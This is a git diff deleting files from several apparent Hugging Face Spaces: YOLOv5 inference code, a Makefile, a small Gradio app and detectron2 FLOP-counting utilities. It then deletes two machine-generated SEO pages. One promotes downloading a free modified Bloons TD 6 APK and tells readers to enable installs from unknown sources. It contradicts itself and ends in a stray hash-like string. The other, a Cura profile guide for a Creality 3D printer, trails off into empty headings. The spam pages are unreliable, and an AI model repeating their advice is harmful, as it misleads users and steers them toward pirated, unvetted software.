tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) - elif pb: # GraphDef https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt - LOGGER.info(f'Loading {w} for TensorFlow GraphDef inference...') - import tensorflow as tf - - def wrap_frozen_graph(gd, inputs, outputs): - x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped - ge = x.graph.as_graph_element - return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) - - def gd_outputs(gd): - name_list, input_list = [], [] - for node in gd.node: # tensorflow.core.framework.node_def_pb2.NodeDef - name_list.append(node.name) - input_list.extend(node.input) - return sorted(f'{x}:0' for x in list(set(name_list) - set(input_list)) if not x.startswith('NoOp')) - - gd = tf.Graph().as_graph_def() # TF GraphDef - with open(w, 'rb') as f: - gd.ParseFromString(f.read()) - frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) - elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python - try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu - from tflite_runtime.interpreter import Interpreter, load_delegate - except ImportError: - import tensorflow as tf - Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate, - if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime - LOGGER.info(f'Loading {w} for TensorFlow Lite Edge TPU inference...') - delegate = { - 'Linux': 'libedgetpu.so.1', - 'Darwin': 'libedgetpu.1.dylib', - 'Windows': 'edgetpu.dll'}[platform.system()] - interpreter = Interpreter(model_path=w, experimental_delegates=[load_delegate(delegate)]) - else: # TFLite - LOGGER.info(f'Loading {w} for TensorFlow Lite inference...') - interpreter = Interpreter(model_path=w) # load TFLite model - interpreter.allocate_tensors() # allocate - input_details = interpreter.get_input_details() # inputs - output_details = interpreter.get_output_details() # outputs - # load metadata - with contextlib.suppress(zipfile.BadZipFile): - with zipfile.ZipFile(w, "r") as model: - meta_file = model.namelist()[0] - meta = ast.literal_eval(model.read(meta_file).decode("utf-8")) - stride, names = int(meta['stride']), meta['names'] - elif tfjs: # TF.js - raise NotImplementedError('ERROR: YOLOv5 TF.js inference is not supported') - elif paddle: # PaddlePaddle - LOGGER.info(f'Loading {w} for PaddlePaddle inference...') - check_requirements('paddlepaddle-gpu' if cuda else 'paddlepaddle') - import paddle.inference as pdi - if not Path(w).is_file(): # if not *.pdmodel - w = next(Path(w).rglob('*.pdmodel')) # get *.pdmodel file from *_paddle_model dir - weights = Path(w).with_suffix('.pdiparams') - config = pdi.Config(str(w), str(weights)) - if cuda: - config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) - predictor = pdi.create_predictor(config) - input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) - output_names = predictor.get_output_names() - elif triton: # NVIDIA Triton Inference Server - LOGGER.info(f'Using {w} as Triton Inference Server...') - check_requirements('tritonclient[all]') - from utils.triton import TritonRemoteModel - model = TritonRemoteModel(url=w) - nhwc = model.runtime.startswith("tensorflow") - else: - raise NotImplementedError(f'ERROR: {w} is not a supported format') - - # class names - if 'names' not in locals(): - names = yaml_load(data)['names'] if data else {i: f'class{i}' for 
i in range(999)} - if names[0] == 'n01440764' and len(names) == 1000: # ImageNet - names = yaml_load(ROOT / 'data/ImageNet.yaml')['names'] # human-readable names - - self.__dict__.update(locals()) # assign all variables to self - - def forward(self, im, augment=False, visualize=False): - # YOLOv5 MultiBackend inference - b, ch, h, w = im.shape # batch, channel, height, width - if self.fp16 and im.dtype != torch.float16: - im = im.half() # to FP16 - if self.nhwc: - im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) - - if self.pt: # PyTorch - y = self.model(im, augment=augment, visualize=visualize) if augment or visualize else self.model(im) - elif self.jit: # TorchScript - y = self.model(im) - elif self.dnn: # ONNX OpenCV DNN - im = im.cpu().numpy() # torch to numpy - self.net.setInput(im) - y = self.net.forward() - elif self.onnx: # ONNX Runtime - im = im.cpu().numpy() # torch to numpy - y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) - elif self.xml: # OpenVINO - im = im.cpu().numpy() # FP32 - y = list(self.executable_network([im]).values()) - elif self.engine: # TensorRT - if self.dynamic and im.shape != self.bindings['images'].shape: - i = self.model.get_binding_index('images') - self.context.set_binding_shape(i, im.shape) # reshape if dynamic - self.bindings['images'] = self.bindings['images']._replace(shape=im.shape) - for name in self.output_names: - i = self.model.get_binding_index(name) - self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) - s = self.bindings['images'].shape - assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" - self.binding_addrs['images'] = int(im.data_ptr()) - self.context.execute_v2(list(self.binding_addrs.values())) - y = [self.bindings[x].data for x in sorted(self.output_names)] - elif self.coreml: # CoreML - im = im.cpu().numpy() - im = Image.fromarray((im[0] * 255).astype('uint8')) - # im = im.resize((192, 320), Image.ANTIALIAS) - y = self.model.predict({'image': im}) # coordinates are xywh normalized - if 'confidence' in y: - box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels - conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float) - y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) - else: - y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) - elif self.paddle: # PaddlePaddle - im = im.cpu().numpy().astype(np.float32) - self.input_handle.copy_from_cpu(im) - self.predictor.run() - y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] - elif self.triton: # NVIDIA Triton Inference Server - y = self.model(im) - else: # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) - im = im.cpu().numpy() - if self.saved_model: # SavedModel - y = self.model(im, training=False) if self.keras else self.model(im) - elif self.pb: # GraphDef - y = self.frozen_func(x=self.tf.constant(im)) - else: # Lite or Edge TPU - input = self.input_details[0] - int8 = input['dtype'] == np.uint8 # is TFLite quantized uint8 model - if int8: - scale, zero_point = input['quantization'] - im = (im / scale + zero_point).astype(np.uint8) # de-scale - self.interpreter.set_tensor(input['index'], im) - self.interpreter.invoke() - y = [] - for output in self.output_details: - x = self.interpreter.get_tensor(output['index']) - if int8: - scale, zero_point = output['quantization'] - x = (x.astype(np.float32) - zero_point) * scale # re-scale - y.append(x) - 
y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] - y[0][..., :4] *= [w, h, w, h] # xywh normalized to pixels - - if isinstance(y, (list, tuple)): - return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] - else: - return self.from_numpy(y) - - def from_numpy(self, x): - return torch.from_numpy(x).to(self.device) if isinstance(x, np.ndarray) else x - - def warmup(self, imgsz=(1, 3, 640, 640)): - # Warmup model by running inference once - warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton - if any(warmup_types) and (self.device.type != 'cpu' or self.triton): - im = torch.empty(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input - for _ in range(2 if self.jit else 1): # - self.forward(im) # warmup - - @staticmethod - def _model_type(p='path/to/model.pt'): - # Return model type from model path, i.e. path='path/to/model.onnx' -> type=onnx - # types = [pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs, paddle] - from export import export_formats - from utils.downloads import is_url - sf = list(export_formats().Suffix) # export suffixes - if not is_url(p, check=False): - check_suffix(p, sf) # checks - url = urlparse(p) # if url may be Triton inference server - types = [s in Path(p).name for s in sf] - types[8] &= not types[9] # tflite &= not edgetpu - triton = not any(types) and all([any(s in url.scheme for s in ["http", "grpc"]), url.netloc]) - return types + [triton] - - @staticmethod - def _load_metadata(f=Path('path/to/meta.yaml')): - # Load metadata from meta.yaml if it exists - if f.exists(): - d = yaml_load(f) - return d['stride'], d['names'] # assign stride, names - return None, None - - -class AutoShape(nn.Module): - # YOLOv5 input-robust model wrapper for passing cv2/np/PIL/torch inputs. Includes preprocessing, inference and NMS - conf = 0.25 # NMS confidence threshold - iou = 0.45 # NMS IoU threshold - agnostic = False # NMS class-agnostic - multi_label = False # NMS multiple labels per box - classes = None # (optional list) filter by class, i.e. = [0, 15, 16] for COCO persons, cats and dogs - max_det = 1000 # maximum number of detections per image - amp = False # Automatic Mixed Precision (AMP) inference - - def __init__(self, model, verbose=True): - super().__init__() - if verbose: - LOGGER.info('Adding AutoShape... ') - copy_attr(self, model, include=('yaml', 'nc', 'hyp', 'names', 'stride', 'abc'), exclude=()) # copy attributes - self.dmb = isinstance(model, DetectMultiBackend) # DetectMultiBackend() instance - self.pt = not self.dmb or model.pt # PyTorch model - self.model = model.eval() - if self.pt: - m = self.model.model.model[-1] if self.dmb else self.model.model[-1] # Detect() - m.inplace = False # Detect.inplace=False for safe multithread inference - m.export = True # do not output loss values - - def _apply(self, fn): - # Apply to(), cpu(), cuda(), half() to model tensors that are not parameters or registered buffers - self = super()._apply(fn) - if self.pt: - m = self.model.model.model[-1] if self.dmb else self.model.model[-1] # Detect() - m.stride = fn(m.stride) - m.grid = list(map(fn, m.grid)) - if isinstance(m.anchor_grid, list): - m.anchor_grid = list(map(fn, m.anchor_grid)) - return self - - @smart_inference_mode() - def forward(self, ims, size=640, augment=False, profile=False): - # Inference from various sources. 
For size(height=640, width=1280), RGB images example inputs are: - # file: ims = 'data/images/zidane.jpg' # str or PosixPath - # URI: = 'https://ultralytics.com/images/zidane.jpg' - # OpenCV: = cv2.imread('image.jpg')[:,:,::-1] # HWC BGR to RGB x(640,1280,3) - # PIL: = Image.open('image.jpg') or ImageGrab.grab() # HWC x(640,1280,3) - # numpy: = np.zeros((640,1280,3)) # HWC - # torch: = torch.zeros(16,3,320,640) # BCHW (scaled to size=640, 0-1 values) - # multiple: = [Image.open('image1.jpg'), Image.open('image2.jpg'), ...] # list of images - - dt = (Profile(), Profile(), Profile()) - with dt[0]: - if isinstance(size, int): # expand - size = (size, size) - p = next(self.model.parameters()) if self.pt else torch.empty(1, device=self.model.device) # param - autocast = self.amp and (p.device.type != 'cpu') # Automatic Mixed Precision (AMP) inference - if isinstance(ims, torch.Tensor): # torch - with amp.autocast(autocast): - return self.model(ims.to(p.device).type_as(p), augment=augment) # inference - - # Pre-process - n, ims = (len(ims), list(ims)) if isinstance(ims, (list, tuple)) else (1, [ims]) # number, list of images - shape0, shape1, files = [], [], [] # image and inference shapes, filenames - for i, im in enumerate(ims): - f = f'image{i}' # filename - if isinstance(im, (str, Path)): # filename or uri - im, f = Image.open(requests.get(im, stream=True).raw if str(im).startswith('http') else im), im - im = np.asarray(exif_transpose(im)) - elif isinstance(im, Image.Image): # PIL Image - im, f = np.asarray(exif_transpose(im)), getattr(im, 'filename', f) or f - files.append(Path(f).with_suffix('.jpg').name) - if im.shape[0] < 5: # image in CHW - im = im.transpose((1, 2, 0)) # reverse dataloader .transpose(2, 0, 1) - im = im[..., :3] if im.ndim == 3 else cv2.cvtColor(im, cv2.COLOR_GRAY2BGR) # enforce 3ch input - s = im.shape[:2] # HWC - shape0.append(s) # image shape - g = max(size) / max(s) # gain - shape1.append([int(y * g) for y in s]) - ims[i] = im if im.data.contiguous else np.ascontiguousarray(im) # update - shape1 = [make_divisible(x, self.stride) for x in np.array(shape1).max(0)] if self.pt else size # inf shape - x = [letterbox(im, shape1, auto=False)[0] for im in ims] # pad - x = np.ascontiguousarray(np.array(x).transpose((0, 3, 1, 2))) # stack and BHWC to BCHW - x = torch.from_numpy(x).to(p.device).type_as(p) / 255 # uint8 to fp16/32 - - with amp.autocast(autocast): - # Inference - with dt[1]: - y = self.model(x, augment=augment) # forward - - # Post-process - with dt[2]: - y = non_max_suppression(y if self.dmb else y[0], - self.conf, - self.iou, - self.classes, - self.agnostic, - self.multi_label, - max_det=self.max_det) # NMS - for i in range(n): - scale_boxes(shape1, y[i][:, :4], shape0[i]) - - return Detections(ims, y, files, dt, self.names, x.shape) - - -class Detections: - # YOLOv5 detections class for inference results - def __init__(self, ims, pred, files, times=(0, 0, 0), names=None, shape=None): - super().__init__() - d = pred[0].device # device - gn = [torch.tensor([*(im.shape[i] for i in [1, 0, 1, 0]), 1, 1], device=d) for im in ims] # normalizations - self.ims = ims # list of images as numpy arrays - self.pred = pred # list of tensors pred[0] = (xyxy, conf, cls) - self.names = names # class names - self.files = files # image filenames - self.times = times # profiling times - self.xyxy = pred # xyxy pixels - self.xywh = [xyxy2xywh(x) for x in pred] # xywh pixels - self.xyxyn = [x / g for x, g in zip(self.xyxy, gn)] # xyxy normalized - self.xywhn = [x / g for x, g in 
zip(self.xywh, gn)] # xywh normalized - self.n = len(self.pred) # number of images (batch size) - self.t = tuple(x.t / self.n * 1E3 for x in times) # timestamps (ms) - self.s = tuple(shape) # inference BCHW shape - - def _run(self, pprint=False, show=False, save=False, crop=False, render=False, labels=True, save_dir=Path('')): - s, crops = '', [] - for i, (im, pred) in enumerate(zip(self.ims, self.pred)): - s += f'\nimage {i + 1}/{len(self.pred)}: {im.shape[0]}x{im.shape[1]} ' # string - if pred.shape[0]: - for c in pred[:, -1].unique(): - n = (pred[:, -1] == c).sum() # detections per class - s += f"{n} {self.names[int(c)]}{'s' * (n > 1)}, " # add to string - s = s.rstrip(', ') - if show or save or render or crop: - annotator = Annotator(im, example=str(self.names)) - for *box, conf, cls in reversed(pred): # xyxy, confidence, class - label = f'{self.names[int(cls)]} {conf:.2f}' - if crop: - file = save_dir / 'crops' / self.names[int(cls)] / self.files[i] if save else None - crops.append({ - 'box': box, - 'conf': conf, - 'cls': cls, - 'label': label, - 'im': save_one_box(box, im, file=file, save=save)}) - else: # all others - annotator.box_label(box, label if labels else '', color=colors(cls)) - im = annotator.im - else: - s += '(no detections)' - - im = Image.fromarray(im.astype(np.uint8)) if isinstance(im, np.ndarray) else im # from np - if show: - display(im) if is_notebook() else im.show(self.files[i]) - if save: - f = self.files[i] - im.save(save_dir / f) # save - if i == self.n - 1: - LOGGER.info(f"Saved {self.n} image{'s' * (self.n > 1)} to {colorstr('bold', save_dir)}") - if render: - self.ims[i] = np.asarray(im) - if pprint: - s = s.lstrip('\n') - return f'{s}\nSpeed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {self.s}' % self.t - if crop: - if save: - LOGGER.info(f'Saved results to {save_dir}\n') - return crops - - @TryExcept('Showing images is not supported in this environment') - def show(self, labels=True): - self._run(show=True, labels=labels) # show results - - def save(self, labels=True, save_dir='runs/detect/exp', exist_ok=False): - save_dir = increment_path(save_dir, exist_ok, mkdir=True) # increment save_dir - self._run(save=True, labels=labels, save_dir=save_dir) # save results - - def crop(self, save=True, save_dir='runs/detect/exp', exist_ok=False): - save_dir = increment_path(save_dir, exist_ok, mkdir=True) if save else None - return self._run(crop=True, save=save, save_dir=save_dir) # crop results - - def render(self, labels=True): - self._run(render=True, labels=labels) # render results - return self.ims - - def pandas(self): - # return detections as pandas DataFrames, i.e. print(results.pandas().xyxy[0]) - new = copy(self) # return copy - ca = 'xmin', 'ymin', 'xmax', 'ymax', 'confidence', 'class', 'name' # xyxy columns - cb = 'xcenter', 'ycenter', 'width', 'height', 'confidence', 'class', 'name' # xywh columns - for k, c in zip(['xyxy', 'xyxyn', 'xywh', 'xywhn'], [ca, ca, cb, cb]): - a = [[x[:5] + [int(x[5]), self.names[int(x[5])]] for x in x.tolist()] for x in getattr(self, k)] # update - setattr(new, k, [pd.DataFrame(x, columns=c) for x in a]) - return new - - def tolist(self): - # return a list of Detections objects, i.e. 
'for result in results.tolist():' - r = range(self.n) # iterable - x = [Detections([self.ims[i]], [self.pred[i]], [self.files[i]], self.times, self.names, self.s) for i in r] - # for d in x: - # for k in ['ims', 'pred', 'xyxy', 'xyxyn', 'xywh', 'xywhn']: - # setattr(d, k, getattr(d, k)[0]) # pop out of list - return x - - def print(self): - LOGGER.info(self.__str__()) - - def __len__(self): # override len(results) - return self.n - - def __str__(self): # override print(results) - return self._run(pprint=True) # print results - - def __repr__(self): - return f'YOLOv5 {self.__class__} instance\n' + self.__str__() - - -class Proto(nn.Module): - # YOLOv5 mask Proto module for segmentation models - def __init__(self, c1, c_=256, c2=32): # ch_in, number of protos, number of masks - super().__init__() - self.cv1 = Conv(c1, c_, k=3) - self.upsample = nn.Upsample(scale_factor=2, mode='nearest') - self.cv2 = Conv(c_, c_, k=3) - self.cv3 = Conv(c_, c2) - - def forward(self, x): - return self.cv3(self.cv2(self.upsample(self.cv1(x)))) - - -class Classify(nn.Module): - # YOLOv5 classification head, i.e. x(b,c1,20,20) to x(b,c2) - def __init__(self, c1, c2, k=1, s=1, p=None, g=1): # ch_in, ch_out, kernel, stride, padding, groups - super().__init__() - c_ = 1280 # efficientnet_b0 size - self.conv = Conv(c1, c_, k, s, autopad(k, p), g) - self.pool = nn.AdaptiveAvgPool2d(1) # to x(b,c_,1,1) - self.drop = nn.Dropout(p=0.0, inplace=True) - self.linear = nn.Linear(c_, c2) # to x(b,c2) - - def forward(self, x): - if isinstance(x, list): - x = torch.cat(x, 1) - return self.linear(self.drop(self.pool(self.conv(x)).flatten(1))) diff --git a/spaces/Arnx/MusicGenXvAKN/Makefile b/spaces/Arnx/MusicGenXvAKN/Makefile deleted file mode 100644 index 5bfd89dd833d7448b21073eb6ee7cfac1d5157dd..0000000000000000000000000000000000000000 --- a/spaces/Arnx/MusicGenXvAKN/Makefile +++ /dev/null @@ -1,21 +0,0 @@ -default: linter tests - -install: - pip install -U pip - pip install -U -e '.[dev]' - -linter: - flake8 audiocraft && mypy audiocraft - flake8 tests && mypy tests - -tests: - coverage run -m pytest tests - coverage report --include 'audiocraft/*' - -docs: - pdoc3 --html -o docs -f audiocraft - -dist: - python setup.py sdist - -.PHONY: linter tests docs dist diff --git a/spaces/Augustya/ai-subject-answer-generator/app.py b/spaces/Augustya/ai-subject-answer-generator/app.py deleted file mode 100644 index 5108a2ab5869bbd681434a5d5fecfe4f89872b4a..0000000000000000000000000000000000000000 --- a/spaces/Augustya/ai-subject-answer-generator/app.py +++ /dev/null @@ -1,7 +0,0 @@ -import gradio as gr -import os - -hf_token = os.environ['GRADIO_API_KEY'] - -iface = gr.load(name="Augustya/ai-email-subject-question-answering-generator", hf_token=hf_token, src="spaces") -iface.queue(api_open=False).launch(show_api=False) \ No newline at end of file diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/analysis.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/analysis.py deleted file mode 100644 index 178da7968cc08c29ec61b823bba8b74e8d97e1d6..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/analysis.py +++ /dev/null @@ -1,188 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-# -*- coding: utf-8 -*- - -import typing -from typing import Any, List -import fvcore -from fvcore.nn import activation_count, flop_count, parameter_count, parameter_count_table -from torch import nn - -from detectron2.export import TracingAdapter - -__all__ = [ - "activation_count_operators", - "flop_count_operators", - "parameter_count_table", - "parameter_count", - "FlopCountAnalysis", -] - -FLOPS_MODE = "flops" -ACTIVATIONS_MODE = "activations" - - -# Some extra ops to ignore from counting, including elementwise and reduction ops -_IGNORED_OPS = { - "aten::add", - "aten::add_", - "aten::argmax", - "aten::argsort", - "aten::batch_norm", - "aten::constant_pad_nd", - "aten::div", - "aten::div_", - "aten::exp", - "aten::log2", - "aten::max_pool2d", - "aten::meshgrid", - "aten::mul", - "aten::mul_", - "aten::neg", - "aten::nonzero_numpy", - "aten::reciprocal", - "aten::repeat_interleave", - "aten::rsub", - "aten::sigmoid", - "aten::sigmoid_", - "aten::softmax", - "aten::sort", - "aten::sqrt", - "aten::sub", - "torchvision::nms", # TODO estimate flop for nms -} - - -class FlopCountAnalysis(fvcore.nn.FlopCountAnalysis): - """ - Same as :class:`fvcore.nn.FlopCountAnalysis`, but supports detectron2 models. - """ - - def __init__(self, model, inputs): - """ - Args: - model (nn.Module): - inputs (Any): inputs of the given model. Does not have to be tuple of tensors. - """ - wrapper = TracingAdapter(model, inputs, allow_non_tensor=True) - super().__init__(wrapper, wrapper.flattened_inputs) - self.set_op_handle(**{k: None for k in _IGNORED_OPS}) - - -def flop_count_operators(model: nn.Module, inputs: list) -> typing.DefaultDict[str, float]: - """ - Implement operator-level flops counting using jit. - This is a wrapper of :func:`fvcore.nn.flop_count` and adds supports for standard - detection models in detectron2. - Please use :class:`FlopCountAnalysis` for more advanced functionalities. - - Note: - The function runs the input through the model to compute flops. - The flops of a detection model is often input-dependent, for example, - the flops of box & mask head depends on the number of proposals & - the number of detected objects. - Therefore, the flops counting using a single input may not accurately - reflect the computation cost of a model. It's recommended to average - across a number of inputs. - - Args: - model: a detectron2 model that takes `list[dict]` as input. - inputs (list[dict]): inputs to model, in detectron2's standard format. - Only "image" key will be used. - supported_ops (dict[str, Handle]): see documentation of :func:`fvcore.nn.flop_count` - - Returns: - Counter: Gflop count per operator - """ - old_train = model.training - model.eval() - ret = FlopCountAnalysis(model, inputs).by_operator() - model.train(old_train) - return {k: v / 1e9 for k, v in ret.items()} - - -def activation_count_operators( - model: nn.Module, inputs: list, **kwargs -) -> typing.DefaultDict[str, float]: - """ - Implement operator-level activations counting using jit. - This is a wrapper of fvcore.nn.activation_count, that supports standard detection models - in detectron2. - - Note: - The function runs the input through the model to compute activations. - The activations of a detection model is often input-dependent, for example, - the activations of box & mask head depends on the number of proposals & - the number of detected objects. - - Args: - model: a detectron2 model that takes `list[dict]` as input. - inputs (list[dict]): inputs to model, in detectron2's standard format. 
- Only "image" key will be used. - - Returns: - Counter: activation count per operator - """ - return _wrapper_count_operators(model=model, inputs=inputs, mode=ACTIVATIONS_MODE, **kwargs) - - -def _wrapper_count_operators( - model: nn.Module, inputs: list, mode: str, **kwargs -) -> typing.DefaultDict[str, float]: - # ignore some ops - supported_ops = {k: lambda *args, **kwargs: {} for k in _IGNORED_OPS} - supported_ops.update(kwargs.pop("supported_ops", {})) - kwargs["supported_ops"] = supported_ops - - assert len(inputs) == 1, "Please use batch size=1" - tensor_input = inputs[0]["image"] - inputs = [{"image": tensor_input}] # remove other keys, in case there are any - - old_train = model.training - if isinstance(model, (nn.parallel.distributed.DistributedDataParallel, nn.DataParallel)): - model = model.module - wrapper = TracingAdapter(model, inputs) - wrapper.eval() - if mode == FLOPS_MODE: - ret = flop_count(wrapper, (tensor_input,), **kwargs) - elif mode == ACTIVATIONS_MODE: - ret = activation_count(wrapper, (tensor_input,), **kwargs) - else: - raise NotImplementedError("Count for mode {} is not supported yet.".format(mode)) - # compatible with change in fvcore - if isinstance(ret, tuple): - ret = ret[0] - model.train(old_train) - return ret - - -def find_unused_parameters(model: nn.Module, inputs: Any) -> List[str]: - """ - Given a model, find parameters that do not contribute - to the loss. - - Args: - model: a model in training mode that returns losses - inputs: argument or a tuple of arguments. Inputs of the model - - Returns: - list[str]: the name of unused parameters - """ - assert model.training - for _, prm in model.named_parameters(): - prm.grad = None - - if isinstance(inputs, tuple): - losses = model(*inputs) - else: - losses = model(inputs) - - if isinstance(losses, dict): - losses = sum(losses.values()) - losses.backward() - - unused: List[str] = [] - for name, prm in model.named_parameters(): - if prm.grad is None: - unused.append(name) - prm.grad = None - return unused diff --git a/spaces/Benson/text-generation/Examples/Bloons Td 6 Apk Download Android.md b/spaces/Benson/text-generation/Examples/Bloons Td 6 Apk Download Android.md deleted file mode 100644 index 2a10f8f48e8c7c6a4b1b002282323620997cac6d..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Bloons Td 6 Apk Download Android.md +++ /dev/null @@ -1,49 +0,0 @@ - -

Bloons TD 6 APK Download for Android: How to Install and Play the Best Tower Defense Game

If you are a fan of tower defense games, you have probably heard of Bloons TD, one of the most popular and successful series in the genre. The latest installment, Bloons TD 6, is a strategy-gaming gem that will keep you hooked for hours.

Bloons TD 6 is a game in which you build the perfect defense from a combination of powerful monkey towers and awesome heroes, then pop every last invading bloon. You can choose from dozens of maps, modes, challenges, and customizations to create your own unique experience.

bloons td 6 apk download android

Download: https://bltlly.com/2v6JFG

But what if you want to play Bloons TD 6 on your Android device without paying for it? There is a way to do that: you can download and install the Bloons TD 6 APK, a modified version of the game that lets you play it for free.

In this article, we will show you how to download and install the Bloons TD 6 APK on your Android device, along with some tips and tricks for playing the game. Let's get started!

Features of the Bloons TD 6 APK Download for Android

The Bloons TD 6 APK is not just a simple tower defense game. It is a rich and varied game that offers plenty of features and content to explore. Here are some of its main features:

• Huge content: The Bloons TD 6 APK is constantly updated with new features and content to keep you entertained. You can take part in boss events, odysseys, contested territory, quests, the trophy store, and the content browser. You can also create your own maps, modes, and challenges and share them with other players.

• Endless awesomeness: The Bloons TD 6 APK has a 4-player co-op mode where you can team up with friends or strangers and pop bloons together. You can also play offline and enjoy the game without an internet connection. The game includes 68 maps, ranging from easy to expert difficulty, plus Monkey Knowledge, Powers, and Insta-Monkeys to help you in your battles.

How to Download and Install the Bloons TD 6 APK on Android

Downloading and installing the Bloons TD 6 APK on your Android device is quick and easy. Just follow these simple steps:

1. Enable unknown sources on your device: To install the Bloons TD 6 APK, you need to allow your device to install apps from unknown sources. Go to your device settings, then Security or Privacy, and enable Unknown Sources (or allow installing apps from unknown sources).

2. Download the Bloons TD 6 APK file from a trusted source: Many websites offer the Bloons TD 6 APK for free, but not all of them are safe or reliable. Some may contain viruses or malware that can damage your device or steal your data. To avoid this, download the APK file only from a source you trust, such as [this one].

3. Locate and install the APK file on your device: After the download finishes, find the file in your device storage using a file manager app or your device's built-in file explorer. Tap it and follow the on-screen instructions to install it.

4. Launch the game and enjoy: Once the installation is complete, launch the game by tapping its icon on the home screen or in the app drawer. You can now enjoy playing Bloons TD 6 for free on your Android device.

Tips and Tricks for Playing the Bloons TD 6 APK on Android

• Choose the right monkey towers and heroes for each map and mode: Different monkey towers and heroes have different strengths and weaknesses, and some are more effective against certain bloon types or in certain situations. For example, Dart Monkeys provide good early-game popping power but struggle against camo bloons. Sniper Monkeys are great at long range but fire slowly. Quincy is a versatile hero who can pop most bloon types but is not very strong against MOAB-class bloons. Pick the towers and heroes that suit the map layout, the bloon types, and the game mode you are playing.

• Use activated abilities wisely and at the right time: Some monkey towers and heroes have activated abilities that can give you an edge. For example, the Super Monkey's Tech Terror ability can destroy every bloon on screen, while Gwendolin's Firestorm ability sets all bloons on fire for a short time. These abilities have cooldowns and costs, so save them for a tough wave of bloons or for when you need a burst of popping power.

• Upgrade your Monkey Knowledge and unlock new perks: Monkey Knowledge is a system that lets you unlock new perks for your monkey towers and heroes. You earn Monkey Knowledge points by leveling up or completing certain achievements, and you can spend them across branches such as Primary, Military, Magic, Support, and Heroes. These perks grant benefits such as extra range, damage, pierce, speed, and income. Unlock the perks that fit your strategy and play style.

• Join the community and share your creations and feedback: Bloons TD 6 has a vibrant, friendly community of players who love the game and want to share their experiences and opinions. You can join in through the game's official website, subreddit, Discord server, YouTube channel, or social media pages, and share your creations and feedback with the developers and other players through the content browser, the in-game chat, or the rating and review system. You can also support the game by buying in-game items or watching ads.

Conclusion

The Bloons TD 6 APK is a fantastic tower defense game that will keep you entertained for hours, with plenty of features and content that make it fun and challenging. You can download and install it on your Android device for free by following the steps in this article, and use our tips and tricks to improve your game and have even more fun.

So what are you waiting for? Download the Bloons TD 6 APK now and enjoy popping bloons with your monkey towers and heroes!

Frequently Asked Questions

• Q1: Is it safe to download and install the Bloons TD 6 APK?

• A1: Yes, as long as you download it from a trusted source and follow the instructions carefully.

• Q2: How much does the Bloons TD 6 APK cost?

• A2: It is free to download and install, but it contains in-game items that can be purchased with real money. You can disable in-app purchases in your device settings.

• Q3: What are the system requirements for the Bloons TD 6 APK?

• A3: It requires Android 5.0 or higher, at least 2 GB of RAM, and about 100 MB of storage space.

• Q4: Can I play the Bloons TD 6 APK offline?

• A4: Yes, as noted in the features above, the game can be played offline without an internet connection.

• Q5: Can I play the Bloons TD 6 APK with my friends?

• A5: Yes, you can play with up to three other players in co-op mode. You can also join forces with other players and fight for territory against five other teams in Contested Territory mode.

    64aa2da5cf
    -
    -
    \ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Creality Ender 3 S1 Pro Cura Perfil Descargar.md b/spaces/Benson/text-generation/Examples/Creality Ender 3 S1 Pro Cura Perfil Descargar.md deleted file mode 100644 index a274b60bc14cafa3ee22ed264ee62477c99cebcd..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Creality Ender 3 S1 Pro Cura Perfil Descargar.md +++ /dev/null @@ -1,84 +0,0 @@ - -

Creality Ender 3 S1 Pro Cura Profile Download: A Beginner's Guide

If you are new to 3D printing, you may be wondering what the Creality Ender 3 S1 Pro is and why you need a Cura profile for it. In this article, we will explain everything you need to know about this impressive 3D printer and how to use Cura, a free, open-source slicing program, to get the best results.

creality ender 3 s1 pro cura profile download

Download Zip: https://bltlly.com/2v6IHI

What Is Cura and Why Does It Matter for 3D Printing?

Cura is software that converts 3D models into instructions for 3D printers. It is also known as a slicer, because it slices the model into thin layers that the printer prints one at a time. Cura is one of the most popular slicers on the market: it is easy to use, compatible with many printers, and offers plenty of features and settings for customizing your prints.

Cura matters because it determines how your printer will print your model. It controls factors such as print speed, temperature, infill, support, retraction, and cooling, and these factors affect the quality, strength, accuracy, durability, appearance, and print time of your parts. Choosing the right Cura profile for your printer and model is therefore essential for getting good results.

How to Download and Install Cura on Your Computer

Downloading and installing Cura on your computer is very easy. Just follow these steps:

1. Go to the official Cura website and click "Download Ultimaker Cura".

2. Select your operating system.

      Cómo personalizar y optimizar su perfil de Cura para su Creality Ender 3 S1 Pro?

      - -
